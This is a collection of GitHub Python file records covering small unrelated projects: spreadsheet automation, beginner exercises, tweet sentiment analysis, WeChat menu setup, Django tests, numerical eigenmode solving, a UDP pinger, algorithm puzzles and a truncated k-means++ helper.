+{"seq_id":"7718342456","text":"#!/usr/bin/python\n# FINAL SCRIPT updated as of 8th April 2020\n# Workflow - CBA/MEDICLINIC\n# Version 1\n\n# Declare Python libraries needed for this script\nimport pandas as pd\nimport numpy as np\nfrom xlrd import open_workbook\nimport xlrd\nimport os\nimport math\n\ndef populate_data_medi(disbursementClaim, bordlisting, disbursementMaster, destination, medi_base):\n\n try:\n DCM_df, BordListing_df, DC_df = medi_mapping(disbursementMaster, bordlisting, disbursementClaim)\n DCM_df.to_excel(destination + 'disbursement master(new).xlsx', index = False)\n BordListing_df.to_excel(destination + \"Bord Listing(new).xlsx\", index = False, header = False)\n DC_df.to_excel(destination + \"Disbursement Claim(new).xlsx\", index = False, header = False)\n except Exception as error:\n print('ERROR')\n\ndef medi_mapping(disbursementMaster, bordereauxListing, disbursementClaim):\n \n wb = xlrd.open_workbook(bordereauxListing)\n bordlist_df = pd.read_excel(wb)\n\n dcm_workbook = open_workbook(disbursementMaster)\n dcm_sheet = dcm_workbook.sheet_by_index(0)\n df = pd.read_excel(dcm_workbook)\n \n if df.columns[0] != 'Date':\n dcm_df = pd.read_excel(disbursementMaster, sheet_by_index = 0, skiprows = 2, usecols = list(range(dcm_sheet.ncols + 1)))\n else:\n dcm_df = pd.read_excel(disbursementMaster, sheet_by_index = 0, skiprows = 0, usecols = list(range(dcm_sheet.ncols + 1)))\n\n newRunnningNo = dcm_df.iloc[get_DCM_fill_index(disbursementMaster), 1]\n newRowIndex = get_DCM_fill_index(disbursementMaster)\n\n # Perform update data into new row in Disbursement Claim Master file\n print(\"- Perform update data into new row in Disbursement Claim Master file.\")\n \n data2 = pd.read_excel(bordereauxListing, skiprows = 11)\n totalCases = get_number_cases_price(bordereauxListing)\n price = data2.loc[get_number_cases_price(bordereauxListing), 'Aetna Amount']\n initial = data2.loc[get_Initial_index(bordereauxListing), 'Aetna Amount']\n ##Mapping\n bordlist_df.iloc[5,2] = newRunnningNo\n dcm_df.loc[newRowIndex, 'Date'] = bordlist_df.iloc[3, 2]\n dcm_df.loc[newRowIndex, 'Bord No'] = bordlist_df.iloc[2, 2]\n dcm_df.loc[newRowIndex, 'Corporate'] = bordlist_df.iloc[0, 2]\n dcm_df.loc[newRowIndex, 'Amount (RM) \\n(Kindly put (RM0.00) for CN)'] = price\n dcm_df.loc[newRowIndex, 'Initial'] = initial\n dcm_df.loc[newRowIndex, 'Total no of cases bord'] = totalCases\n\n ###Populate Disbursement Claim\n wb = xlrd.open_workbook(disbursementClaim)\n dc_df = pd.read_excel(wb)\n\n dc_df.iloc[18, 3] = newRunnningNo\n dc_df.iloc[18, 8] = dcm_df.loc[newRowIndex, 'Date']\n dc_df.iloc[28, 3] = dcm_df.loc[newRowIndex, 'Bord No']\n dc_df.iloc[28, 0] = dcm_df.loc[newRowIndex, 'Corporate']\n dc_df.iloc[28, 7] = price\n dc_df.iloc[54, 6] = initial\n\n\n return dcm_df, bordlist_df, dc_df\n \ndef get_DCM_fill_index(disbursementMaster):\n dcm_workbook = open_workbook(disbursementMaster)\n dcm_sheet = dcm_workbook.sheet_by_index(0)\n df = pd.read_excel(dcm_workbook)\n if df.columns[0] != 'Date':\n data=pd.read_excel(disbursementMaster, skiprows = 2 , na_values = \"Missing\")\n else:\n data=pd.read_excel(disbursementMaster, skiprows = 0 , na_values = \"Missing\")\n\n Bord_No_list = pd.DataFrame(data, columns=['Bord No']).values.tolist()\n counter=len(Bord_No_list)-1\n try:\n while True:\n math.isnan(Bord_No_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter+1\n return fill_index\n\ndef get_number_cases_price(bordereauxListing):\n data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = 
\"Missing\")\n Diagnosis_Description_list = pd.DataFrame(data, columns=['Diagnosis Description [Code]']).values.tolist()\n counter=len(Diagnosis_Description_list)-1\n try:\n while True:\n math.isnan(Diagnosis_Description_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter+1\n return fill_index\n\ndef get_Initial_index(bordereauxListing):\n data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = \"Missing\")\n Anetna_Amount_Column_list = pd.DataFrame(data, columns=['Aetna Amount']).values.tolist()\n counter=len(Anetna_Amount_Column_list)-1\n try:\n while True:\n math.isnan(Anetna_Amount_Column_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter-1\n return fill_index\n\n","repo_name":"WendellTeam/AICoreEngine","sub_path":"AIEngine/transformation/populate_data_medi.py","file_name":"populate_data_medi.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3424521328","text":"# Digitar indefinidos valores e parar se o usuário digitar 999.\n# mostrar a soma e quantos valores foram digitados\nc = s = 0 # contador\nwhile True:\n n = int(input('\\033[31mDigite um valor (999 para parar): \\033[m'))\n if n == 999: # se colocar o break no final ele lê 999 adiciona 1 no contador e 999 na soma\n break\n c += 1\n s += n\nprint(f'\\033[1;32mA soma dos {c} valores é {s}\\033[m')","repo_name":"borgesgfj/python_basic_exercises","sub_path":"exerc66.py","file_name":"exerc66.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8555900856","text":"# import functions from data.py\nfrom data.data import *\n\n\n# Display Menu function\ndef displayMenu():\n print()\n # Display main menu\n print(\"\"\"=============================\nVehicle Traffic at Border 1 \n================================================================================================================================================\n 1.Display the number of vehicle crossings by city in 2012.\n 2.Mean of vehicle-crossings from 2010 to 2015 and years and the number of vehicle crossings in that period which fall below the mean found.\n 3.Vehicle crossings increased by at least 6% over the previous year.\n 4.Display Chart\n 5.Exit/Quit\n================================================================================================================================================\n \"\"\")\n\n\n# Main Function\ndef Main():\n readData()\n inputOp = True\n while inputOp:\n displayMenu()\n\n # Get Menu Input\n inputOp = input(\"Choose your menu : \")\n print()\n # Menu 1\n if inputOp == '1':\n option1()\n # Menu 2\n elif inputOp == '2':\n city = input(\"Enter city name : \")\n option2(city)\n # Menu 3\n elif inputOp == '3':\n city = input(\"Enter city name : \")\n option3(city)\n # Menu 4\n elif inputOp == '4':\n option4()\n # Menu 5\n elif inputOp == '5':\n quest = input(\"Are you sure ? 
(Y/N) : \")\n if quest == \"Y\":\n exit()\n # If nothing matches continue the loop\n else:\n continue\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"Abhijith14/PythonProjects","sub_path":"Project 1 - Vehicle Traffic Border1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"16862418929","text":"import tweepy\r\nfrom textblob import TextBlob\r\nimport csv\r\nfrom sys import argv\r\n\r\n\r\nSTART_DATE = \"2016-10-13\"\r\nEND_DATE = \"2018-02-14\"\r\nDATEFETCH = False\r\n\r\ndef tweeterAuth():\r\n consumer_key = \"CONSUMER KEY\"\r\n consumer_secret = \"CONSUMER SECRET\"\r\n access_token = \"ACCESS TOKEN\"\r\n access_token_secret = \"ACCESS TOKEN SECRET\"\r\n\r\n auth = tweepy.OAuthHandler(consumer_key,consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n\r\n api = tweepy.API(auth)\r\n return api\r\n\r\ndef SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH):\r\n if DATEFETCH == True:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT, since = START_DATE, until=END_DATE)\r\n else:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT)\r\n return public_tweets\r\n\r\ndef Print_and_Save(public_tweets):\r\n num_pos = 0\r\n num_neg = 0\r\n num_neu = 0\r\n ann = []\r\n tweetList = []\r\n\r\n csvFile = open('tweetSave.csv','w')\r\n fieldName = ['Serial','Tweet','Label']\r\n writer = csv.DictWriter(csvFile, fieldnames=fieldName)\r\n writer.writerow({'Serial':'Serial','Tweet': 'Tweet', 'Label':'Label'})\r\n count = 0\r\n\r\n for tweet in public_tweets:\r\n count = count+1\r\n analysis = TextBlob(tweet.text)\r\n tweetList.append(tweet.text)\r\n ann.append(analysis.sentiment)\r\n\r\n resultLabel = analysis.sentiment[0]\r\n if resultLabel == 0:\r\n result = 'Neutral'\r\n num_neu = num_neu+1\r\n if resultLabel < 0:\r\n result = 'Negative'\r\n num_neg = num_neg+1\r\n if resultLabel > 0:\r\n result = 'Positive'\r\n num_pos = num_pos+1\r\n\r\n print('Serial_'+str(count)+': '+tweet.text)\r\n print('{'+result+'}')\r\n print('')\r\n writer.writerow({ 'Serial': count,'Tweet': tweet.text.encode('utf8'), 'Label': result })\r\n return num_neu,num_neg,num_pos\r\ndef main(argv):\r\n SEARCH_TOPIC = argv[1]\r\n FETCH_COUNT = argv[2]\r\n api = tweeterAuth()\r\n public_tweets = SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH)\r\n num_neu,num_neg,num_pos = Print_and_Save(public_tweets)\r\n\r\n print('Total Tweets Collected = ' + str(FETCH_COUNT))\r\n print('----------------------------')\r\n print('Neutral = '+str(num_neu))\r\n print('Negative = '+str(num_neg))\r\n print('Positive = '+str(num_pos))\r\n print('----------------------------')\r\n\r\nif __name__== \"__main__\":\r\n main(argv)\r\n\r\n\r\nbreakPoint=1\r\n","repo_name":"Nahid1992/SentimentAnalysis--Tweet_using_TextBlob","sub_path":"mainTweet.py","file_name":"mainTweet.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14581812895","text":"def dfs(n, cnt):\n global ans\n if cnt == 4:\n ans = 1\n return\n visit[n] = 1\n for v in graph[n]:\n if not visit[v]:\n visit[v] = 1\n dfs(v, cnt + 1)\n visit[v] = 0\n\n\nN, M = map(int, input().split())\ngraph = [[] for _ in range(N)]\nvisit = [0] * N\nfor _ in range(M):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\nans = 0\nfor i in range(N):\n dfs(i, 
0)\n visit[i] = 0\n if ans:\n break\nprint(ans)\n","repo_name":"dannyp0930/algorithm","sub_path":"baekjoon/13023_ABCDE.py","file_name":"13023_ABCDE.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29916843667","text":"\nimport numpy as np\nimport math\ndef is_magic(square):\n x,y,z=[],[],[]\n if len(square)==0:\n return True\n n=len(square)\n l = len(square[0])\n b=int(abs(1-math.pow(n,2)))\n for i in square:\n x.append(sum([j for j in i]))\n x.append(sum([square[i][i] for i in range(l)]))\n x.append(sum([square[l-1-i][i] for i in range(l-1,-1,-1)]))\n m=np.array(square)\n m=m.T\n for i in m:\n x.append(sum([j for j in i])) \n if square==[[2]] or set(x)=={38}:\n return False\n if len(set(x))==1:\n return True\n else:\n return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"7WpdYfZPNFCM4oBvd_1.py","file_name":"7WpdYfZPNFCM4oBvd_1.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14395551734","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 2 14:11:02 2020\n\n@author: Kirty\n\"\"\"\n\ns1=\"listen\"\ns2 = \"silent\"\ndef Isanagram(s1,s2):\n \n if sorted(s1)==sorted(s2):\n return \"anagram\"\n else:\n return \"Not an anagram\"\n \n \nprint(Isanagram(s1,s2))\n\n# time complexity = O(1)\n# aux space = O(1)","repo_name":"kirtymeena/DSA","sub_path":"4.string/1.Anagram.py","file_name":"1.Anagram.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12455601840","text":"# Audrey D.\n# May 2020\n\nimport numpy as np\n\nimport scipy.linalg as la\nimport scipy.interpolate as itp\n\n\ndef cheb(N, inter=None):\n \n \"\"\"\n Chebyshev polynomial\n \"\"\"\n\n N -= 1\n\n if N==0:\n return None\n \n xx = np.cos(np.pi*np.arange(N+1)/N)\n cc = np.r_[2, np.ones(N-1), 2]*(-1)**np.arange(N+1)\n X = np.tile(xx[:,None], (1, N+1))\n dX = X - X.T\n D = (cc[:,None]/cc[None,:])/(dX + np.diag(np.ones(N+1)))\n D = D - np.diag(D.sum(axis=1))\n\n if not inter is None:\n L = inter[1] - inter[0]\n D = -D*2/L\n xx = (xx[::-1] + 1) * L/2. + inter[0]\n \n return D, xx\n\n\n\ndef SL_chebsolve(alsq, zw, Nmod=\"auto\", Nz=\"auto\", grav=0, sm=0, ksplin=3, zbot=None):\n \n \"\"\" \n Solve Sturm-Liouville problem with ev k: w'' + k*alsq*w = 0, w(-H)=w(0)=0\n between zbot (default: zw[0]) and zw[-1] = 0\n wmod and umod (=wmod') are normalized by max value, with u positive at surface\n if grav != 0: free-surface boundary condition. \n :return: tuple with (wmod, umod), eigenvalue sqrt(k) and z-cheb\n Based on Noe code, May 2020\n \"\"\"\n if Nz==\"auto\":\n Nz = int(len(zw)*3/2.)\n if Nmod == \"auto\":\n Nmod = int(Nz/2)\n if zbot is None: \n zbot = zw[0]\n \n # Chebyshev Polynomial Interpolation\n Dz, zz = cheb(Nz, [zbot, zw[-1]])\n alsq = itp.UnivariateSpline(zw, alsq, k=ksplin, s=sm)(zz)\n \n # Construc Operator\n LL = np.r_[ np.c_[ np.diag(np.ones(Nz)), -Dz ] \\\n , np.c_[ -Dz, np.zeros((Nz,Nz)) ] ]\n AA = np.diag(np.r_[np.zeros(Nz), alsq])\n \n # Boundary Conditions\n LL[Nz,:] = 0. # bottom\n LL[-1,:] = 0. 
# top\n if grav > 0:\n LL[-1,-1] = 0.\n AA[-1,-1] = grav\n LL[-1,Nz-1] = 1.\n \n # Diagonalize Operator\n lam, vect = la.eig(LL, AA)\n \n # Filter eigenvalues\n inds, = np.where( (np.isfinite(lam)) & (abs(lam.real)<1e3) & (abs(lam.imag)<1e-6) & (lam.real>0) )\n lam, vect = lam[inds], vect[:,inds]\n \n # Sort eigenvalues\n inds = lam.real.argsort()[:Nmod]\n \n # Normalize the eigenvectors\n vect = vect[:,inds]/abs(vect[:,inds]).max(axis=0)[None,:]\n lam = lam[inds]\n\n ww = vect[Nz:,:]\n uu = vect[:Nz,:]\n ww *= np.sign(uu[-1:,:])\n uu *= np.sign(uu[-1:,:])\n\n return (ww, uu), np.sqrt(lam), zz\n\n\n\ndef norm_mode(mode,z):\n \n \"\"\"\n Normalize the basis of the eigenmode given \n the scalar product = \\int_-H^0 fxg dz\n \\int_-H^0 phi(z)^2 dz = H (for all mode phi)\n :return: normalized eigenmode vector\n Audrey Oct. 2019\n \"\"\"\n\n scl = 0\n \n for k in range(z.size):\n if k==0 :\n scl += mode[k]**2 *(z[k+1]-z[k])\n else :\n scl += mode[k]**2 *(z[k]-z[k-1])\n\n scl = np.sqrt(np.abs(scl/(z[0]-z[-1])))\n\n return mode/scl\n\n\n\n\n\n\n\n","repo_name":"slgentil/gigatl_jet","sub_path":"sav_yannick/spectre/modes_func.py","file_name":"modes_func.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42969850873","text":"import requests\nimport json\nfrom core.server.wxconfig import WxConfig\nfrom core.cache.tokencache import TokenCache\nfrom core.logger_helper import logger\nfrom core.server.wxauthorize import WxAuthorServer\n\n\nclass WxMenuServer(object):\n \"\"\"\n 微信自定义菜单\n\n create_menu 自定义菜单创建接口\n get_menu 自定义菜单查询接口\n delete_menu 自定义菜单删除接口\n create_menu_data 创建菜单数据\n \"\"\"\n\n _token_cache = TokenCache() # 微信token缓存\n _wx_author_server = WxAuthorServer() # 微信网页授权server\n\n def create_menu(self):\n \"\"\"自定义菜单创建接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_create_url + access_token\n data = self.create_menu_data()\n r = requests.post(url, data.encode('utf-8'))\n logger.debug('【微信自定义菜单】自定义菜单创建接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单创建接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单创建接口获取不到access_token')\n\n def get_menu(self):\n \"\"\"自定义菜单查询接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_get_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单查询接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单查询接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单查询接口获取不到access_token')\n\n def delete_menu(self):\n \"\"\"自定义菜单删除接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_delete_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单删除接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单删除接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单删除接口获取不到access_token')\n\n def create_menu_data(self):\n 
\"\"\"创建菜单数据\"\"\"\n menu_data = {'button': []} # 大菜单\n menu_Index0 = {\n 'type': 'view',\n 'name': '测试菜单1',\n 'url': self._wx_author_server.get_code_url('menuIndex0')\n }\n menu_data['button'].append(menu_Index0)\n MENU_DATA = json.dumps(menu_data, ensure_ascii=False)\n logger.debug('【微信自定义菜单】创建菜单数据MENU_DATA[' + str(MENU_DATA) + ']')\n return MENU_DATA\n\nif __name__ == '__main__':\n wx_menu_server = WxMenuServer()\n '''创建菜单数据'''\n # wx_menu_server.create_menu_data()\n # '''自定义菜单创建接口'''\n wx_menu_server.create_menu()\n '''自定义菜单查询接口'''\n # wx_menu_server.get_menu()\n '''自定义菜单删除接口'''\n # wx_menu_server.delete_menu()","repo_name":"sufaith/python_weixin","sub_path":"core/server/wxmenu.py","file_name":"wxmenu.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"zh","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"7093544052","text":"import json\n\ntry: # django <= 1.6\n from django.core.urlresolvers import reverse\nexcept ImportError: # from django 1.7 to django 2.0 (and more)\n from django.urls import reverse\nfrom django.test import TestCase, override_settings\nfrom django.test.client import Client\nfrom tests.models import MicroBlogPost\n\nimport mock\nimport responses\nfrom knowledge_share.views import (_clean_category_name,\n _normalize_and_split_data)\n\n\n@override_settings(\n SLACK_TOKEN='1234',\n)\nclass SlackSlashWebHookViewTests(TestCase):\n url_name = 'tests:microblog-slack-slash'\n\n def setUp(self):\n self.view_url = reverse(self.url_name)\n self.client = Client(HTTP_HOST='localtest.com')\n self.post_params = {\n 'text': 'My blog Post [category]',\n 'token': '1234',\n }\n\n def test_post_with_invalid_params(self):\n response = self.client.post(self.view_url)\n self.assertEqual(response.status_code, 400)\n\n def test_post_with_invalid_token_params(self):\n self.post_params['token'] = '123'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 400)\n\n @responses.activate\n def test_post_with_valid_params(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n\n @override_settings(KNOWLEDGE_USE_TWITTER=False)\n def test_post_without_categories(self):\n self.post_params['text'] = 'My blog Post'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n self.assertEqual(microblog_post.category.count(), 0)\n\n @responses.activate\n def test_post_with_valid_params_create_an_object(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n\n @responses.activate\n def test_post_with_valid_params_post_on_twitter(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n 
self.assertTrue(microblog_post.posted_on_twitter)\n\n @responses.activate\n def test_post_create_category_tags(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n category = microblog_post.category.first()\n self.assertTrue(category.name, 'category')\n\n @mock.patch('knowledge_share.twitter_helpers.logger')\n @responses.activate\n def test_post_with_twitter_error(self, mocked):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=400,\n content_type='application/json'\n )\n response = self.client.post(self.view_url, self.post_params)\n mocked.error.assert_called_once_with(\n \"Tried to post a microblog post on Twitter but got a ClientError,\"\n \" check your twitter keys.\")\n self.assertIn('(it worked! But twitter posting failed)',\n json.loads(response.content.decode('utf-8'))['text'])\n\n\nclass SlackSlashCommandHelpersTest(TestCase):\n\n def test_normalize_and_split_data(self):\n content = _normalize_and_split_data('My blog Post[category]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'category')\n\n def test_normalize_and_split_data_with_square_braces(self):\n content = _normalize_and_split_data('A list is like this foo[1], awesome.')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1], awesome.')\n self.assertEqual(content[1], '')\n\n def test_normalize_and_split_data_with_square_braces_and_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1][Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_square_braces_and_space_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1] [Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_multiple_categories(self):\n content = _normalize_and_split_data('My blog Post[Python, Django]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'Python, Django')\n\n def test_normalize_without_category(self):\n content = _normalize_and_split_data('My blog Post')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], '')\n\n def test_clean_category_name(self):\n category = _clean_category_name(' Category')\n self.assertEqual(category, 'category')\n","repo_name":"vintasoftware/django-knowledge-share","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"32"} +{"seq_id":"10205583621","text":"from mysql_operation.mysql_operation import query_table\nfrom question_analyse.question_pretreatment import question_segment, build_abstract_question, \\\n extract_keywords, best_match_template\nfrom template.question_template import build_sql_sentence, build_answer\n\n\ndef answer_question_template(question: str):\n # 分词 并 词性标注\n question_seq = 
question_segment(question)\n # 构造抽象问句\n abstract_question = build_abstract_question(question_seq)\n # 抽取关键词字典\n keywords = extract_keywords(question_seq)\n # 问题模版类型\n type = keywords['type']\n # 最合适的问题模版\n match_template, keyword, answer_template = best_match_template(abstract_question, type)\n # 构造sql语句\n sql_sentence = build_sql_sentence(match_template, type, keywords)\n # 数据库查询\n answer_list = []\n if sql_sentence == \"\":\n answer_list.append(\"无法构建查询语句\")\n else:\n result = query_table(sql_sentence)\n if len(result) == 0:\n answer_list.append(\"无法查询\")\n else:\n for item in result:\n answer = build_answer(answer_template, item)\n answer_list.append(answer)\n return answer_list\n\n\nif __name__ == '__main__':\n print('Hello World')\n","repo_name":"MayerX/grad_project","sub_path":"question_answer/answer_question_template.py","file_name":"answer_question_template.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72460178651","text":"from turtle import Turtle\r\n\r\n\r\nclass Score_card(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.color(\"white\")\r\n self.penup()\r\n self.goto(-70, 270)\r\n self.score = 0\r\n with open(\"data.text\") as file:\r\n self.high_score = int(file.read())\r\n self.update_score()\r\n self.hideturtle()\r\n\r\n def update_score(self):\r\n self.clear()\r\n self.write(f\"Score:{self.score} High Score:{self.high_score}\", align=\"left\", font=(\"Arial\", 15, \"bold\"))\r\n\r\n def increase_score(self):\r\n self.score += 1\r\n self.update_score()\r\n\r\n def reset(self):\r\n if self.score > self.high_score:\r\n with open(\"data.text\", mode=\"w\") as file:\r\n self.high_score = file.write(f\"{self.score}\")\r\n self.score = 0\r\n self.update_score()\r\n\r\n","repo_name":"abhinavS1911/Python-projects","sub_path":"Snake-Safari/score_card.py","file_name":"score_card.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43439390459","text":"from socket import *\r\nimport time\r\n\r\nservername='127.0.0.1'\r\nserverport= 12000\r\nclientSocket=socket(AF_INET,SOCK_DGRAM)\r\nclientSocket.settimeout(1)\r\n\r\nfor i in range(1,11):\r\n t0=time.time()\r\n clientSocket.sendto(('Ping %d %s' % (i,t0)).encode(), (servername,serverport))\r\n try:\r\n modifiedMessage,serveraddress=clientSocket.recvfrom(1024)\r\n total_time=time.time()-t0\r\n print('%d: response by %s RTT=%.3f'%(i,servername,total_time))\r\n\r\n except Exception as e:\r\n print('%d: time out!' %i)\r\nclientSocket.close()\r\n\r\n","repo_name":"NightFaint/Code-diary","sub_path":"Computer-Network/homework2/UDPPinger.py","file_name":"UDPPinger.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"2329363057","text":"\"\"\"\nhttps://leetcode-cn.com/problems/longest-string-chain/v\n\n\n1048. 
最长字符串链\n给出一个单词列表,其中每个单词都由小写英文字母组成。\n\n如果我们可以在 word1 的任何地方添加一个字母使其变成 word2,那么我们认为 word1 是 word2 的前身。例如,\"abc\" 是 \"abac\" 的前身。\n\n词链是单词 [word_1, word_2, ..., word_k] 组成的序列,k >= 1,其中 word_1 是 word_2 的前身,word_2 是 word_3 的前身,依此类推。\n\n从给定单词列表 words 中选择单词组成词链,返回词链的最长可能长度。\n\n\n示例:\n\n输入:[\"a\",\"b\",\"ba\",\"bca\",\"bda\",\"bdca\"]\n输出:4\n解释:最长单词链之一为 \"a\",\"ba\",\"bda\",\"bdca\"。\n\n\n提示:\n\n1 <= words.length <= 1000\n1 <= words[i].length <= 16\nwords[i] 仅由小写英文字母组成。\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def longestStrChain(self, words: List[str]) -> int:\n word_set = {word: 1 for word in words}\n word_list = sorted(words, key=lambda x: len(x))\n for word in word_list:\n for i in range(len(word)):\n new_word = word[:i] + word[i+1:]\n word_set[word] = max(word_set[word], word_set.get(new_word, 0) + 1)\n # print(word_set)\n return max(word_set.values())\n\n# 十分简单的DP\n","repo_name":"ironboxer/leetcode","sub_path":"python/1048.py","file_name":"1048.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7407233019","text":"import random\nfrom math import sqrt\nimport matplotlib.pyplot as plt\n\ndef weighted_choice(weights):\n ''' Chooses an element with probabilty given by its weight \n on a total of weights. Uses the \"roulette method\". Info at \n http://eli.thegreenplace.net/2010/01/22/weighted-random-generation-in-python'''\n \n rnd = random.random() * sum(weights)\n for i, w in enumerate(weights):\n rnd -= w\n if rnd < 0:\n return i\n \n \ndef d(p1,p2):\n ''' Euclidean distance between two points in R^n '''\n \n return sqrt(sum( \n [(p1[i]-p2[i])**2 for i in range(len(p1))] \n ))\n \n \ndef KPlusPlus_iterate(l,m):\n ''' Given a list of points and the means already found, makes a steps of\n the k++ method '''\n \n weights= [ min([d(x1,x2) for x2 in m ]) **2 if x1 not in m else 0\n for x1 in l ]\n return l[weighted_choice(weights) ]\n \n\ndef KPlusPlus(l,k):\n ''' Implements the k++ algorithm on a list l, to be passed afterwards to\n the k-means. 
